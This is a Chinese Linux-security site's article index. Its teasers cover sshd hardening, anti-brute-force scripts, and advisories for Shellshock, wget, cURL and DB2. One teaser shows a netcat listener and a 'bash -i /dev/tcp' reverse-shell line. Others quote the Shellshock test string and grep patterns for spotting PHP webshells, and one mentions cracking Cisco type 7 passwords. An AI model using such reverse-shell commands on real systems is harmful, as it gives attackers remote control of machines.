欢迎光临IT网Linux学习频道

当前位置: > Linux安全 >
  • [Linux安全] 设置Linux sshd确保远程服务器访问安全 日期:2014-11-27 14:43:25 点击:126 好评:0

    虽然SSH的设计目的在于安全访问,但它有的功能确实为入侵敞开了大门。不过只要稍作修改,Linux管理员就可以让sshd更加安全。 多数Linux服务器在默认下通过SSH运行Secure Shell Daemon (sshd)进程以便进行远程访问。Linuxsshd是一种简单的方式,允许远程用...

  • [Linux安全] Linux如何使用命令生成反弹SHELL 日期:2014-11-27 12:15:30 点击:167 好评:0

    【Reverse shell】也叫反弹shell,是渗透攻击的基本功,如果你找到机会让远端的机器执行你注入的代码,你的代码怎样才能为你生成一个可以交互操作的shell呢? 你可以在本地先用nc启动一个监听进程【nc -l 端口号】 然后在远端执行【bash -i /dev/tcp/你本地的...

  • [Linux安全] 多个IBM DB2产品远程拒绝服务漏洞(CVE-2014-6159) 日期:2014-11-23 15:18:19 点击:126 好评:0

    发布日期:2014-11-07 更新日期:2014-11-18 受影响系统: IBM DB2 9.x IBM DB2 10.x 描述: BUGTRAQ ID: 71006 CVE(CAN) ID: CVE-2014-6159 IBM DB2是一个大型的商业关系数据库系统。 IBM DB2 9.7-FP10、9.8-FP5、10.5-FP4(Linux, UNIX, Windows)在启用...

  • [Linux安全] cURL/libcURL 'curl_easy_duphandle()'函数堆内存破坏漏洞 日期:2014-11-23 15:17:39 点击:167 好评:0

    发布日期:2014-11-05 更新日期:2014-11-18 受影响系统: cURL cURL 7.17.1-7.38.0 描述: BUGTRAQ ID: 70988 CVE(CAN) ID: CVE-2014-3707 cURL/libcURL是命令行传输文件工具,支持FTP、FTPS、HTTP、HTTPS、GOPHER、TELNET、DICT、FILE和LDAP。 cURL/libcU...

  • [Linux安全] 追查黑客攻击常用linux命令 日期:2014-11-21 12:07:50 点击:165 好评:0

    1 可以得出filename正在运行的进程 #pidof filename 2 可以通过文件或者tcp udp协议看到进程 #fuser -n tcp port 3 可以看文件修改时间,大小等信息 #stat filename 4 看加载模块 #lsmod 5 看rpc服务开放 #rpcinfo -p 6 看网卡是否混杂模式(promiscuous mod)...

  • [Linux安全] 用SHELL脚本来防止暴力破解 日期:2014-11-18 18:55:30 点击:157 好评:0

    我的一台公网服务器,由于网站采取的是双备份策略,所以开放了vsftpd的21端口,近来发现许多人在尝试暴力破解vsftpd和ssh,我随便看了看/var/log/secure日志,显示如下: 118.33.110.52=2834 119.145.254.77=37 121.254.179.199=226 121.88.250.243=35 200.29...

  • [Linux安全] linux下shell脚本防ssh暴力破解 日期:2014-11-18 18:51:59 点击:214 好评:0

    功能:查询一分钟前secure文件,统计访问失败的IP和次数,并把在1分钟内失败5次的IP列入危险susperctip,1分钟内失败10次直接丢给防火墙拦截,并记录在blockip,关于关键词可以根据需求加强下 #!/bin/bash ##Filteringscript ##CreateTime:2012-10-12.17 # t...

  • [Linux安全] shell防ssh vsftpd暴力破解脚本 日期:2014-11-18 18:51:18 点击:182 好评:0

    从余大神那要过来的ssh和vsftpd防暴力破解脚本,不知道为什么复制51cto blog上的脚本老是报-gt错误,所以在自己blog上共享给需要的人. view source print? 01 #!/bin/bash 02 #Denyhosts For vsftpd and sshd 03 #2012-12-04 04 awk {for(i=1;i=NF;i++){if($i ~...

  • [Linux安全] 用脚本简化部署DenyHosts防SSH暴力破解 日期:2014-11-18 18:50:03 点击:142 好评:0

    我的Nagios外网监控服务器,刚开始测试时取的密码是redhat,放进公网一天就被人改了,郁闷死了;另外的几台公网机器(没有硬件防火墙),被人不停的ssh连接,我稍为判断了一下,其中有个IP居然连接失败17000次了;后来环境部署成熟以后发现仍然有不少外网ip在扫...

  • [Linux安全] 防止恶意扫描 用PortSentry保护Linux服务器 日期:2014-11-12 01:45:34 点击:82 好评:0

    我在检查一台CentOS 5.5服务器的安全环境时,发现很多IP在恶意扫描此服务器的端口。本来想部署snort防入侵环境的,后来发现snort环境部署非常复杂,而以上的恶意扫描完全可以用PortSentry来实现。PortSentry是入侵检测工具中配置最简单、效果最直接的工具之...

  • [Linux安全] clickjacking漏洞的挖掘与利用 日期:2014-11-11 02:27:45 点击:103 好评:0

    0x00简介 1 说起clickjacking,很多人其实都不知道是干嘛的。比起XSS来说,clickjacking显得比较神秘,乌云漏洞库里面的相关的漏洞也不到10条而已。 2 瞌睡龙之前发过一篇clickjacking的技术文档,主要是介绍clickjacking出现的原因,以及防御的方法。我这里...

  • [Linux安全] Linux shell快速查找PHP木马 日期:2014-11-06 10:04:48 点击:109 好评:0

    一句话查找PHP木马 # find ./ -name *.php |xargs egrep phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc /tmp/php.txt # grep -r --include=*.php [^a-z]eval($_POST . /tmp/eval.txt # grep -r --include=*.php file_put_conten...

  • [Linux安全] 可能有多达1200万网站因Drupal漏洞被入侵 日期:2014-11-02 19:59:44 点击:158 好评:0

    开源CMS项目Drupal对最近修复的SQL注入漏洞发布了安全警告,如果没有在安全修正发布7小时内打上补丁,那么使用Drupal 7的网站可以假定他们已经遭到了攻击者入侵。自动攻击工具已能利用漏洞去控制网站。 这里的及时是指在发布补丁7小时内,Drupal是在10月15日...

  • [Linux安全] GitLab 不受 Rails 安全漏洞 CVE-2014-7818 影响 日期:2014-11-01 09:07:02 点击:59 好评:0

    CVE-2014-7818 影响使用了 config.serve_static_assets = true 的 Rails 应用,而 Gitlab 中这个配置值为 false,配置文件位于config/environments/production.rb中,因为静态文件直接由 Nginx 或者 Apache 处理。...

  • [Linux安全] wget发现严重安全漏洞 日期:2014-10-31 00:22:21 点击:180 好评:0

    在Linux和Unix系统中广泛使用的开源应用wget发现了一个 严重安全漏洞 ,允许攻击者通过FTP创建任意文件和目录,甚至复写整个文件系统。 该漏洞 是Rapid 7的首席研究官HD Moore 最早报告 给 GNU Wget项目的。不同于此前广泛宣传的Heartbleed,ShellShock,POO...

  • [Linux安全] Linux/Unix中开源应用wget发现严重安全漏洞 日期:2014-10-30 18:33:18 点击:168 好评:2

    在Linux和Unix系统中广泛使用的开源应用wget发现了一个严重安全漏洞,允许攻击者通过FTP创建任意文件和目录,甚至复写整个文件系统。该漏洞是Rapid 7的首席研究官HD Moore最早报告给 GNU Wget项目的。 不同于此前广泛宣传的Heartbleed,ShellShock,POODLE...

  • [Linux安全] CISCO加密密码破解 日期:2014-10-30 18:07:11 点击:100 好评:0

    CISCO设备默认密码是明文显示,存在于配置文件中 但出于安全考虑,可以将密码设置为暗文显示 增加如下配置 service password-encryption 此后,密码相关的配置会按如下显示 enable password 7 095C4F1A0A1218000FBRusername user password 7 12090404011C031...

  • [Linux安全] FTP曝严重远程执行漏洞,影响多个版本Linux(附检测脚本) 日期:2014-10-30 11:41:46 点击:146 好评:0

    10月28日,一份公开的邮件中曝出FTP远程执行命令漏洞,漏洞影响到的Linux系统包括:Fedora, Debian, NetBSD, FreeBSD, OpenBSD, 甚至影响到了苹果的OS X操作系统的最新版本Yosemite 10.10。 NetBSD的一位开发人员(Jared McNeill)证实了这个漏洞可已通过tnftp...

  • [Linux安全] 保障Linux系统的临时文件安全 日期:2014-10-29 19:56:45 点击:102 好评:0

    在一个典型的Linux系统中,至少有两个目录或分区保持着临时文件。其中之一是/tmp目录,再者是/var/tmp。在更新的Linux内核的系统中,还可能有/dev/shm,它是用tmpfs文件系统装载的。 存储临时文件的目录存在着一个问题,即这些目录可以成为损害系统安全的僵尸...

  • [Linux安全] 攻击者利用Shellshock漏洞入侵邮件服务器 日期:2014-10-29 13:53:44 点击:99 好评:0

    攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。 安全研究人员报告,攻击者向邮件服务器发送特定的消息头字段,诱骗服务器执行一个 Perl脚本,成为僵尸网络的一部分。邮件消息头的构成是: Shellshock spam October 2014 (IP地址已隐...

  • [Linux安全] Web应用防火墙 FreeWAF-1.2.2 版本发布 日期:2014-10-29 10:10:35 点击:106 好评:0

    1. 版本 CentOS-6.5-x86_64-minimal-freewaf-1.2.2-release(31806) ubuntu-12.04-server-i386-freewaf-1.2.2-release(31806) ubuntu-12.04-server-amd64-freewaf-1.2.2-release(31806) 2. 防护引擎和网管更新 对配置文件一些敏感信息进行加密存储; 修改了防...

  • [Linux安全] Wget 爆出 CVE-2014-4877 漏洞:FTP 符号链接任意文件系统访问 日期:2014-10-28 14:46:00 点击:70 好评:0

    Wget CVE-2014-4877:FTP 符号链接任意文件系统访问 Wget 爆出 CVE-2014-4877 漏洞:FTP 符号链接任意文件系统访问。 Package: wget Version: 1.15-1 Severity: important Upstream fix: http://git.savannah.gnu.org/cgit/wget.git/commit/?id=18b0979357ed...

  • [Linux安全] 用户账号安全设置 日期:2014-10-28 12:15:00 点击:150 好评:0

    用户账号是计算机使用者的身份凭证或标识,每一个要访问系统资源的人,必须凭借他的用户账号才能进入计算机。在Linux系统中,提供了多种机制来确保用户账号的正当、安全使用。合理地规划用户账号,并合理地分配权限,是保证Linux系统安全的第一步。 1. 清理...

  • [Linux安全] Claws Mail 3.11.0 修复了POODLE 漏洞 日期:2014-10-27 15:12:39 点击:147 好评:0

    随着每一个新版本的推出,Claws Mail 将会越来越好。 Claws Mail 发起于Linux 社区,是一款快速、简单易用,并且充满了很多有趣的特性的开源邮件客户端。开发者们推送了一次大的更新和升级,建议使用者进行升级。 有些人可能不知道这个邮件客户端,但Claws M...

  • [Linux安全] 近期Linux Bash漏洞的处理 日期:2014-10-23 16:59:12 点击:63 好评:0

    手工开一个VPS,用将Centos 模板来运行后,设置好IP可以访问后,运行以下命令来更新: yum update bash -y 也可以参考 http://tanxw.blog.51cto.com/4309543/1558029...

  • [Linux安全] 如何检测并修复bash中的破壳漏洞​​ 日期:2014-10-23 15:25:17 点击:67 好评:0

    2014年9月24日,一位名叫斯特凡沙泽拉的安全研究者发现了一个名为破壳(Shellshock,也称为bash门或Bash漏洞)的bash漏洞。该漏洞如果被渗透,远程攻击者就可以在调用shell前通过在特别精心编制的环境中输出函数定义执行任何程序代码。然后,这些函数内的代...

  • [Linux安全] 在ubuntu中安装和使用nfs 日期:2014-10-23 13:50:42 点击:82 好评:0

    nfs全称Network File System,即网络文件系统。 第一步:安装nfs服务端 sudo apt-get install nfs-kernel-server 第二步:创建目录 创建需要作为nfs的目录,例如mkdir -p /var/nfs 。 修改/var/nfs目录的权限为nobody,chown -R nobody:nobody /var/nfs 。...

  • [Linux安全] linux中bash漏洞检查修复 日期:2014-10-23 13:50:09 点击:69 好评:0

    最近网上闹的比较火的一个安全问题就是bash漏洞,因为这个漏洞影响的系统范围比较大,所以严重程度堪比年初heartbleed bug漏洞。 废话不多说,接下来根据博主的几台服务器来做演示。 检查是否有漏洞,命令如: env VAR=() { :;}; echo Bash is vulnerable! b...

栏目列表
推荐内容